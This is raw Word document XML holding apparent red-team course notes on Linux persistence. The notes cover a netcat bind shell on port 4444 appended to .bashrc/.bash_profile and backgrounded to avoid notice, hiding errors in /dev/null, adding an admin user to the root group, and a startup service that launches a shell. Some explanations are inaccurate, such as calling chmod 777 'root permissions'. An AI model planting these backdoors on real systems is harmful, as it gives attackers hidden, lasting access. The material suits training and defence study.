    <w:p w14:paraId="2B07DDD3" w14:textId="1AF7AC5F" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:t xml:space="preserve">The process is a listening for a bash shell connection on port on 4444, with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008932D3">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32763CB7" w14:textId="73391DF0" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This will</w:t>
      </w:r>
      <w:r w:rsidR="00FC0590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> try to make a new connection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">every 5 minutes </w:t>
      </w:r>
      <w:r w:rsidR="00FC0590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> port 4444 that the attacker can connect to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A6A46C" w14:textId="24F12799" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5288CCA8" w14:textId="65202C16" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4826C7" w14:textId="6C8D8F64" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modifying bash_rc and bash_profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2D54F" w14:textId="71474E7F" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:r w:rsidRPr="008932D3">
        <w:t>In the home directory: /.bash_profile (mac, windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B4217" w14:textId="3694D0CF" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:t>/.bash_rc (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008932D3">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008932D3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B61A1" w14:textId="1E86C991" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:r w:rsidRPr="008932D3">
        <w:t>When you login, this file is executed, so if we modify it then our code will be executed on start up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF76E6" w14:textId="5926E8E3" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008932D3">
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008932D3">
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008932D3">
        <w:t xml:space="preserve"> 4444 -e /bin/bash &amp; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C12B40" w14:textId="1C1C5B8C" w:rsidR="008932D3" w:rsidRPr="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#Write at bottom of file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B3718" w14:textId="6C539F95" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creates a listening port and </w:t>
      </w:r>
      <w:r w:rsidRPr="008932D3">
        <w:t xml:space="preserve">kick it to background </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(&amp;) </w:t>
      </w:r>
      <w:r w:rsidRPr="008932D3">
        <w:t>so the login doesn’t hang and be made obvious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB84EA" w14:textId="713E6FE7" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Can write any binary you want</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0357EA88" w14:textId="00652A9D" w:rsidR="00FC0590" w:rsidRDefault="00FC0590" w:rsidP="00FC0590">
      <w:r>
        <w:t xml:space="preserve">On top of this, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">output your errors into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so that you can hide your errors or any failed attempts so that the user doesn’t see it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44207086" w14:textId="2B8993F5" w:rsidR="00FC0590" w:rsidRDefault="00FC0590" w:rsidP="00FC0590"/>
    <w:p w14:paraId="57FDE69C" w14:textId="39C395DF" w:rsidR="00FC0590" w:rsidRDefault="00FC0590" w:rsidP="00FC0590">
      <w:r>
        <w:t>Adding a user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F595179" w14:textId="188621DD" w:rsidR="00FC0590" w:rsidRDefault="00FC0590" w:rsidP="00FC0590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDD0DB" w14:textId="20BC2D8B" w:rsidR="00FC0590" w:rsidRDefault="00FC0590" w:rsidP="00FC0590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Passwd admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BE71D" w14:textId="280319EE" w:rsidR="00FC0590" w:rsidRDefault="00FC0590" w:rsidP="00FC0590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set user and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A068CF0" w14:textId="73B58D7B" w:rsidR="00FC0590" w:rsidRPr="008932D3" w:rsidRDefault="00FC0590" w:rsidP="00FC0590">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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root admin #Changes admin to root group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614C618" w14:textId="28679446" w:rsidR="008932D3" w:rsidRDefault="008932D3" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B0102E" w14:textId="0E46F3A1" w:rsidR="006417F1" w:rsidRDefault="006417F1" w:rsidP="008932D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create a service that starts on startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238475D4" w14:textId="72607BA8" w:rsidR="006417F1" w:rsidRPr="00A16651" w:rsidRDefault="006417F1" w:rsidP="008932D3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A16651">
        <w:t>Redteamnation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A16651">
        <w:t xml:space="preserve"> has a secretservice file (service) that can be modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277C433" w14:textId="7A74C41A" w:rsidR="006417F1" w:rsidRPr="00A16651" w:rsidRDefault="006417F1" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>Vi /etc/init.d/secretservice #Opens the file so that you can edit it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E323DE0" w14:textId="6782147E" w:rsidR="006417F1" w:rsidRPr="00A16651" w:rsidRDefault="006417F1" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>There is a file in the function of secretservice called secret.sh which is what kicks off the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04591319" w14:textId="3B86392C" w:rsidR="006417F1" w:rsidRPr="00A16651" w:rsidRDefault="006417F1" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>Chmod 777 secret.sh #gives the file root permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8EDA7" w14:textId="77777777" w:rsidR="00A16651" w:rsidRPr="00A16651" w:rsidRDefault="006417F1" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t xml:space="preserve">/etc/init.d/secretservice status </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C9ACA" w14:textId="75D86797" w:rsidR="006417F1" w:rsidRPr="00A16651" w:rsidRDefault="006417F1" w:rsidP="00A16651">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00A16651" w:rsidRPr="00A16651">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A16651">
        <w:t>hows if its running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46238F" w14:textId="74F66803" w:rsidR="006417F1" w:rsidRPr="00A16651" w:rsidRDefault="00A16651" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="006417F1" w:rsidRPr="00A16651">
        <w:t>tart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F4A15A" w14:textId="23A7F94E" w:rsidR="00A16651" w:rsidRPr="00A16651" w:rsidRDefault="00A16651" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>#Return – ‘Payload sent’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0EEAF" w14:textId="77777777" w:rsidR="00A16651" w:rsidRPr="00A16651" w:rsidRDefault="00A16651" w:rsidP="006417F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t xml:space="preserve">/etc/init.d/secretservice stop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52569F3C" w14:textId="61485652" w:rsidR="00A16651" w:rsidRPr="00A16651" w:rsidRDefault="00A16651" w:rsidP="00A16651">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16651">
        <w:t>#Stops the process</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A16651" w:rsidRPr="00A1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0990"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="291445A4"/>
    <w:lvl w:ilvl="0" w:tplc="F6166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1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41"/>
    <w:rsid w:val="000E6AC0"/>
    <w:rsid w:val="00256416"/>
    <w:rsid w:val="002D7B03"/>
    <w:rsid w:val="004B7BBD"/>
    <w:rsid w:val="005C148B"/>
    <w:rsid w:val="005F405A"/>
    <w:rsid w:val="006417F1"/>
    <w:rsid w:val="00720386"/>
    <w:rsid w:val="008932D3"/>
    <w:rsid w:val="00A16651"/>
    <w:rsid w:val="00AB7FA1"/>
    <w:rsid w:val="00FC0590"/>
    <w:rsid w:val="00F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BB6A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9D9ADE7B-3713-4106-8D0F-4B1D8F27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2023-02-06T14:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-07T10:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>